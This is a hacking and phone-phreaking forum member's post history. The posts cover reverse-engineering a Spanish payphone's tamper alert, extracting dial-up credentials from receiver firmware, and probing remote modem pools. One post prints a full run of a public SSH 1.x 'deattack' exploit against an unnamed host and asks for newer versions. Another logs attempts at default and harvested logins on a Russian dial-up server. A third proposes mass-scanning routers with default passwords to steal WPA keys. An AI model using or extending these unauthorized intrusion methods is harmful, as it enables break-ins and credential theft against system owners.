Reaper45

Members
  • Content count

    23
  • Joined

  • Last visited

Everything posted by Reaper45

  1. I'm trying to decode the DTMF tones of a number from a recording I just made. The problem is that there is too much noise from cars and the wind, and it doesn't seem that I will be able to remove it easily. I tried to reduce the noise with adobe audition, but I'm not very good with it. Do you guys want to give a try? The recording is from a payphone in Spain. The payphone automatically dials it when a hack attempt to the setup menu is made (enter *23# and input an incorrect password 3 times). Although the micro goes out, the payphone does not turn off the speaker after that, so I was able to catch it. Soon I'll write a good article on hacking Telefonica payphones http://www.megaupload.com/es/?d=8ZPFGSB0
  2. So I was wondering what my tv sat receiver does when I buy a pay per view movie. It first dials a number with his own modem, which I guessed using dtmf decoder software.. After dialing that number with my PC, Hyperterminal shows me a login screen. Later I hex edited a firmware dump of the receiver and found the username and password it uses to connect, and checked them later. They are valid, but after the login screen, apparently nothing happens next. I tried making a new internet connection with that number and login info, but the connection fails. I think it's because I'm not using the correct protocol... Any ideas on how should I continue? Thanks in advance.
  3. Yeah, but the automated lady says that the number is not in use. It's still amazing that you did this by ear. P.D.: It's the first time I see a forum reply with a disclaimer xD Nice.
  4. You might not have realized yet that the last one was recorded at night and that I did it directly from the payphone's speaker. Anyway, I appreciate a lot your interest in helping me guys. Here's what I realized: The 10th digit that some of you are hearing is indeed a ringback tone. I am able to hear it clearly after forcing the payphone to dial the number. I wonder why it connects so fast. I am also a 99% sure that there are only 9 digits as it is the standard here in Spain. I also have read that the number is different in every state, so the first an the second digit could be "9" and "2", as those are the ones that belong to my city. I'll keep trying to get better recordings, this time with some other hardware.
  5. Oh, I do not. Megaupload always gives me my daily ration of warez xD. I posted a rar just because they were a lot of files. Anyway, finally I was able to get a good recording. Now the software DTMF decoders analyze some tones, even if they are wrong. Here it goes. 15.wav
  6. My very first hack? Well, when I was around 5-6 years old, my father buyed an old 386. Soon my sister installed a pirated version of Prehistorik, and my father used to enter the commands to start the game for me. One day he wasn't there and I tried to do it by myself, but I was scared because my mother told me that if I touched the computer it could broke. So I stayed 30 minutes trying to figure how to use the command dir and how to run executables In the end, the solution to the problem was something like this: c:\>dir [...] c:\>cd prehisto c:\prehisto>dir [...] c:\prehisto>unprehst.com [a crack in RAM memory] Programa instalado correctamente. Fuck you Eric Zmiro!! c:\prehisto>prehisto.exe [the game] Years later, I realized that I had fun doing this too xD. After that, I was curious so I typed c:\prehisto>edit prehisto.exe and I was amazed because it gave me the message "Best protection by Eric Zmiro". This was impressive to me, and then I realized what the "unprehst.com" program was for. P.S.: I still use "dir" instead of "ls" in linux xD.
  7. OK, thanks for the help. I have more recordings, but this one was the best I got. They were made with my Nokia phone (sorry for that ). Next time I'll try recording it at night. By the way, I know for sure that it is a nine digit number. After searching a bit I found a doc that says that there is a number for every state. So we could guess from this that the first one is number 9, and the second is possibly number 2. That is the area code of my state. Also, the paper says that I need a v.23 modem to connect to the number or the payphone... Wikipedia says that I can put my modem in v.23 mode by changing the S37 register (http://en.wikipedia.org/wiki/Hayes_command_set). I tried it with the payphone number but I got a "no carrier" answer. In speed autodetect mode (0), at least I was able to get garbage in the terminal. Payphones here react strangely. If you dial the number, the payphone answers automatically after a tone, and you can hear the noise of the street and the people talking (!!) and a few seconds later, the line is silent and the carrier answers. The board doesn't allow me to upload any .amr or .rar files, so you'll have to deal with mega. (Hint! Sayonara to captcha and hidden links. xD) http://www.megaupload.com/?d=DP73BG50
  8. Tcptrace can get past firewalls that block traceroute. Paratrace from Dan Kaminsky also works well, but in a different way.
  9. I'm sure there are another holes in this host, but I'm curious since I never hacked through a front door like SSH, and this is the perfect chance. It looks like a default installation. Xprobe2 says that the host is running linux kernel 2.2.X. So I telneted to port 22 and... fake@fake-desktop:~$ telnet xxx.xxx.xxx.xxx 22 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. SSH-1.5-1.2.25 Protocol mismatch. Connection closed by foreign host. Incredible right? So I ran to milw0rm and downloaded x2.tgz, an exploit made by some guy from team teso, which seems to have dissapeared already. I choose target 42 as it seems to be the right one in the targets.txt file. fake@fake-desktop:~/$ ./x2 -t 42 xxx.xxx.xxx.xxx SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net) Target: MNS quick - SSH-1.5-1.2.25 Attacking: xxx.xxx.xxx.xxx:22 Testing if remote sshd is vulnerable # ATTACH NOW YES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SURVIVED # (4 ) binary-search: h: 0x083ff7fc, slider: 0x00004000 # SEGV # (5 ) binary-search: h: 0x083fd7fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fe7fc, slider: 0x00001000 # SEGV # (7 ) binary-search: h: 0x083fdffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083fdbfc, slider: 0x00000400 # SURVIVED # (9 ) binary-search: h: 0x083fddfc, slider: 0x00000200 # SURVIVED # (10) binary-search: h: 0x083fdefc, slider: 0x00000100 # SEGV # (11) binary-search: h: 0x083fde7c, slider: 0x00000080 # SURVIVED # (12) binary-search: h: 0x083fdebc, slider: 0x00000040 # SEGV # (13) binary-search: h: 0x083fde9c, slider: 0x00000020 # SURVIVED # (14) binary-search: h: 0x083fdeac, slider: 0x00000010 # SEGV # (15) binary-search: h: 0x083fdea4, slider: 0x00000008 # SURVIVED # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083fdea4 # SEGV # (17) trying: 0x083fdeac # SEGV # (18) trying: 0x083fdeb4 # SEGV # (19) trying: 0x083fdebc # SURVIVED # Exact match found at: 0x00002144 Looking for exact buffer address Finding exact buffer address (20) Trying: 0x08072144 # SEGV # (21) Trying: 0x08073144 # SEGV # (22) Trying: 0x08074144 # SEGV # (23) Trying: 0x08075144 # SEGV # (24) Trying: 0x08076144 # SEGV # (25) Trying: 0x08077144 # SEGV # (26) Trying: 0x08078144 # SEGV # (27) Trying: 0x08079144 # SEGV # (28) Trying: 0x0807a144 # SEGV # (29) Trying: 0x0807b144 # SEGV # (30) Trying: 0x0807c144 # SEGV # (31) Trying: 0x0807d144 # SEGV # (32) Trying: 0x0807e144 # SEGV # (33) Trying: 0x0807f144 # SEGV # (34) Trying: 0x08080144 # SEGV # (35) Trying: 0x08081144 # SEGV # (36) Trying: 0x08082144 # SEGV # (37) Trying: 0x08083144 # SEGV # (38) Trying: 0x08084144 # SEGV # (39) Trying: 0x08085144 # SEGV # (40) Trying: 0x08086144 # SEGV # (41) Trying: 0x08087144 # SEGV # (42) Trying: 0x08088144 # SEGV # (43) Trying: 0x08089144 # SEGV # (44) Trying: 0x0808a144 # SEGV # (45) Trying: 0x0808b144 # SEGV # (46) Trying: 0x0808c144 # SEGV # (47) Trying: 0x0808d144 # SEGV # (48) Trying: 0x0808e144 # SEGV # (49) Trying: 0x0808f144 # SEGV # (50) Trying: 0x08090144 # SEGV # (51) Trying: 0x08091144 # SEGV # (52) Trying: 0x08092144 # SEGV # (53) Trying: 0x08093144 # SEGV # (54) Trying: 0x08094144 # SEGV # (55) Trying: 0x08095144 # SEGV # (56) Trying: 0x08096144 # SEGV # (57) Trying: 0x08097144 # SEGV # (58) Trying: 0x08098144 # SEGV # (59) Trying: 0x08099144 # SEGV # (60) Trying: 0x0809a144 # SEGV # (61) Trying: 0x0809b144 # SEGV # (62) Trying: 0x0809c144 # SEGV # (63) Trying: 0x0809d144 # SEGV # (64) Trying: 0x0809e144 # SEGV # (65) Trying: 0x0809f144 # SEGV # (66) Trying: 0x080a0144 # From now on the exploit won't stop, it's quite clear it's vulnerable but it cannot find the buffer address in memory. So I wanted to ask you if you had any of the other versions of this exploit. I'm aware that x3.tgz and x4.tgz exists, but I was not able to find them.
  10. I remember I was messing around with at+ms= on modem 5:(?), but didn't managed to connect. Also... DN stands for atd + number right? Or am I missing something?
  11. 1) Write your text on the notepad. 2) Paste it on the photo comment box withouth pressing any other key. 3) Update! Found it the other day while uploading a photo. Well... Not surprised since I heard that they use ancestral versions of Apache server xD
  12. Well... Not all bugs can be exploited remotely. I never tried to hack fotolog anyway.
  13. I did not understand a single word xD
  14. I was lucky guessing that the area code was 495. I'm surprised how fast the call was completed. Never called to Russia before The call went through my mobile phone by setting the terminal at 9600 baud. ate1 OK atd+7739-0241 NO CARRIER atd+007739-0241 NO CARRIER atd+7495739-0241 CONNECT 9600 Welcome to TeleCore Login: Mihail Password: Login incorrect Login: Full Access Password: Login incorrect Login: doro Password: Login incorrect NO CARRIER Here you see, I tried the default password of a Ascend Pipeline Terminal server (user: Full Access password: Ascend) and the usernames that finger gave me. But who knows, maybe I'm not dialing to the same node. Anyway, my wallet says it's not a good idea to try to crack the passwords. EDIT: More info. http://208.20.202.14/rte-ascend/1999/Nov/msg00038.html http://archives.real-time.com/rte-ascend/1...p/msg20286.html What's a PRI? If only we had a manual...
  15. That's not the problem. This is a classic case of client-side checks when they should be server-side. I knew that. It was just to point that if you manage to access the server you could easily get root by exploiting that apache version.
  16. If you say that the PSP and the USB cable works fine on another computer, then the problem is isolated on your computer. Try a different USB port.
  17. You might want to play with satellite phones. They're expensive by the way.
  18. Got new info. Resolving the hostnames from the IPs that finger gives us results like VT-X-XX.dialup.access.telecore.net.ru. My guess is that this is a node for dialup access of a russian ISP called telecore. There must be a number for accessing the node. If that's the case, maybe the modems can only answer calls. But I wonder why the IP's from finger only have port 21 open. I was expecting them to be Windows XP hosts. But seeing how outdated the hosts in the range are, they could be using other OS. EDIT: Found them! http://66.102.9.104/translate_c?hl=en&...KBC-tC6S5fUwiNw The DNS server IP is on the range... I'm gonna see if I can cannect to these numbers at 300 baud with voipbuster and certain trick I once used.
  19. http://heim.ifi.uio.no/~stanisls/helppc/hayes_modem_info.html S1 0-255 ring count (clear after 8 sec) (read only) If the affirmation of that s1 register has to be cleared is true, it means we must wait 8 seconds before the next try...? Anyway, whenever I try the command ATS1? it gives me as a result 000.
  20. It's even more amazing that there are hosts on the internet still using the finger service XD. A week ago, finger gave me information on more users. tsri0577670 seems to be always connected. But... Connected to modem 4:14? We got connected to other modems and finger didn't showed information on us that way. If it's not modem, what other device could respond to AT commands? Mobile phones are discarded because it makes no sense
  21. Maybe international calling doesn't work because the modem dials the country code and number too fast. Here in Spain if you dial it that fast it won't work. I mean, to dial an foreign country number, you have to dial country code, wait for some seconds then dial the number. Take a look at 5:16's strange behaviour. Sometimes, when I gave the command ath1 typing on the terminal didn't worked and after some time "no carrier" appeared again. Can we increase the level of messages? To see if there is dialtone, or to do some other tests. ------------------ *** Ascend modem pool server *** Server ready. Connected to modem 5:16... ATDL OK ath1 OK ATDL OK atd,926548569 ►►►►►►►►►►%0►►►►►►►►►► NO CARRIER ath OK ath1 OK atd 9837,7892 7804[D[D[D[D9837%26►►►►►►►►►► NO CARRIER ♥ ♥♥♥ ath OK ath OK atd1 NO CARRIER ath1 OK atd1 1 NO CARRIER ath0 OK ath1 OK NO CARRIER ath OK atha NO CARRIER th ath OK ath OK ath OK ath OK at OK ath OK ath OK ath OK ath1 OK atd1 80000000 1 80000000% NO CARRIER ath OK ath1 OK NO CARRIER ath OK ath1 OK ath AH%18►►►►►►►►►► NO CARRIER iath OK ath1 OK atd 2 89999 AD 2 89999%28►►►►►►►►►►
  22. Sorry for bumping, but I find this topic interesting. I have been playing with this modem pool, although I haven't managed to connect yet. ------------------------------------- Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\[user]>telnet 213.135.65.146 5000 *** Ascend modem pool server *** Server ready. Connected to modem 8:1... ath1 OK atd [number goes here] ►►►►►►►►►► [number goes here]►►►►►►►►►► NO CARRIER Connection lost. C:\Documents and Settings\[user]> ------------------------------------------ Hmmm... If you do ath1 first the number seems to be dialed for real, as the numbers appear more slowly. Also, a search of that IP on google reveals this site: http://zarabotok.my-page.ru/free/modem.htm The server IP is mentioned there. Anyway, I cannot understand anything, not even with google translator.
  23. http://www.514.es/2007/07/fast_http_auth_scanner.html I'm talking about the tool on link. Well, I did that and I was amazed with how many routers with default passwords it revealed. Now two questions come to my mind. First one, the autor of this tool says that compromised routers can be used as a anonymous gateway to internet. Say what? Like a proxy? The only way I imagine this to be achieved is to have a router with VPN options. Am I missing something? Second. If it's that easy to enter a router from the WAN... Maybe we could use this to get the Wifi password? Even if it's WPA. All we had to do is to create a mass scanner like this one, then later add the option to retrieve the password and mac of router, those are usually in a string box. After all that is done we could compare the mac of hacked routers with the ones that are on our wifi range. It's a good idea uh? Despite of it being highly illegal, probably. What are your toughts on it? P.D.: By the way, I had a previous account here, I'm elmaska. It's just that I forgot the password and the email associated with my old account no longer exists.